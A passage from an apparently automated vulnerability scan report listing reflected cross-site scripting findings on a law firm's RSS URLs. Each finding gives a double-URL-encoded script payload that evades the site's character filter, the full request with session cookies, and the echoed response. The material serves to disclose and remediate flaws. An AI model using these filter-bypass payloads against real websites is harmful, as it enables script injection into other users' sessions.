There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Communications21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Communications21c62"><script>alert(1)</script>da39f0f31a2/rss.xml" value="">
...[SNIP]...

2.153. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a was submitted in the REST URL parameter 4. This input was echoed as c659f"><script>alert(1)</script>72b7507567a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Communications/rss.xmlc659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Communications/rss.xmlc659f"><script>alert(1)</script>72b7507567a" value="">
...[SNIP]...

2.154. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650 was submitted in the REST URL parameter 1. This input was echoed as f366f"><script>alert(1)</script>a6a0233650 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssf366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650/practices/Corporate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssf366f"><script>alert(1)</script>a6a0233650/practices/Corporate/rss.xml" value="">
...[SNIP]...

2.155. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb was submitted in the REST URL parameter 2. This input was echoed as 8174b"><script>alert(1)</script>fb0e9ce51eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb/Corporate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices8174b"><script>alert(1)</script>fb0e9ce51eb/Corporate/rss.xml" value="">
...[SNIP]...

2.156. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b was submitted in the REST URL parameter 3. This input was echoed as 114fe"><script>alert(1)</script>550bbc6f87b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Corporate114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Corporate114fe"><script>alert(1)</script>550bbc6f87b/rss.xml" value="">
...[SNIP]...

2.157. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 was submitted in the REST URL parameter 4. This input was echoed as 6f9cb"><script>alert(1)</script>495b8d11a77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Corporate/rss.xml6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Corporate/rss.xml6f9cb"><script>alert(1)</script>495b8d11a77" value="">
...[SNIP]...

2.158. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f was submitted in the REST URL parameter 1. This input was echoed as d782d"><script>alert(1)</script>d2f1002c72f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssd782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f/practices/Election_Law__Government_Ethics/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssd782d"><script>alert(1)</script>d2f1002c72f/practices/Election_Law__Government_Ethics/rss.xml" value="">
...[SNIP]...

2.159. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232 was submitted in the REST URL parameter 2. This input was echoed as 8ddc1"><script>alert(1)</script>11d8c833232 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232/Election_Law__Government_Ethics/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices8ddc1"><script>alert(1)</script>11d8c833232/Election_Law__Government_Ethics/rss.xml" value="">
...[SNIP]...

2.160. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3 was submitted in the REST URL parameter 3. This input was echoed as de06e"><script>alert(1)</script>97b01f23fb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Election_Law__Government_Ethicsde06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Election_Law__Government_Ethicsde06e"><script>alert(1)</script>97b01f23fb3/rss.xml" value="">
...[SNIP]...

2.161. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac was submitted in the REST URL parameter 4. This input was echoed as 6d35d"><script>alert(1)</script>1977a3e2ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Election_Law__Government_Ethics/rss.xml6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Election_Law__Government_Ethics/rss.xml6d35d"><script>alert(1)</script>1977a3e2ac" value="">
...[SNIP]...

2.162. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b was submitted in the REST URL parameter 1. This input was echoed as 290f3"><script>alert(1)</script>18476e2452b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b/practices/Employment__Labor/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss290f3"><script>alert(1)</script>18476e2452b/practices/Employment__Labor/rss.xml" value="">
...[SNIP]...

2.163. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732 was submitted in the REST URL parameter 2. This input was echoed as 9b5ec"><script>alert(1)</script>43dabe5a732 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732/Employment__Labor/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices9b5ec"><script>alert(1)</script>43dabe5a732/Employment__Labor/rss.xml" value="">
...[SNIP]...

2.164. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8 was submitted in the REST URL parameter 3. This input was echoed as e75a9"><script>alert(1)</script>28bea29faf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Employment__Labore75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Employment__Labore75a9"><script>alert(1)</script>28bea29faf8/rss.xml" value="">
...[SNIP]...

2.165. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Employment__Labor/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db was submitted in the REST URL parameter 4. This input was echoed as 7e26b"><script>alert(1)</script>a05a8e876db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Employment__Labor/rss.xml7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Employment__Labor/rss.xml7e26b"><script>alert(1)</script>a05a8e876db" value="">
...[SNIP]...

2.166. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Environment__Safety/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c was submitted in the REST URL parameter 1. This input was echoed as ac191"><script>alert(1)</script>408ea2dc39c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c/practices/Environment__Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


